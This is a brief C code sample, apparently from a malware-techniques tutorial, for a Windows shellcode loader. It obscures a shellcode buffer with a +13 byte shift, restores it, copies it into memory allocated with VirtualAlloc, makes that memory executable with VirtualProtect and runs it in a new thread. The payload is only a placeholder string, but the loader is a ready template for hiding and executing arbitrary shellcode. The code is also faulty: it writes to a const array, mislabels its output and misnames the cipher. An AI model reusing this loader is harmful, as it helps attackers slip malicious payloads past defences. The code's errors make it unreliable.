Adding and subtracting a constant integer ascii value from each of the characters in the shellcode is Ceasar cipher.
#include<stdio.h>
#include<windows.h>
void rot13_encrypt(char* shellcode, int len)
{
int i=0;
for (i = 0; i < len; i++)
{
shellcode[i] = shellcode[i] + 13;
}
}
void rot13_decrypt(char* shellcode, int len)
{
int i=0;
for (i = 0; i < len; i++)
{
shellcode[i] = shellcode[i] - 13;
}
}
void main()
{
PVOID exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
const char shellcode[] = "abcdefghijklmnopqrstuvwxyz";
int len = sizeof shellcode;
rot13_encrypt((char *)shellcode, len);
printf("ROT 13 encrypted code: %s\n", shellcode);
exec_mem = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
rot13_decrypt((char *) shellcode, len);
printf("ROT 13 encrypted code: %s\n", shellcode);
RtlMoveMemory(exec_mem, shellcode, sizeof shellcode);
rv = VirtualProtect(exec_mem, sizeof shellcode, PAGE_EXECUTE_READ, &oldprotect);
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}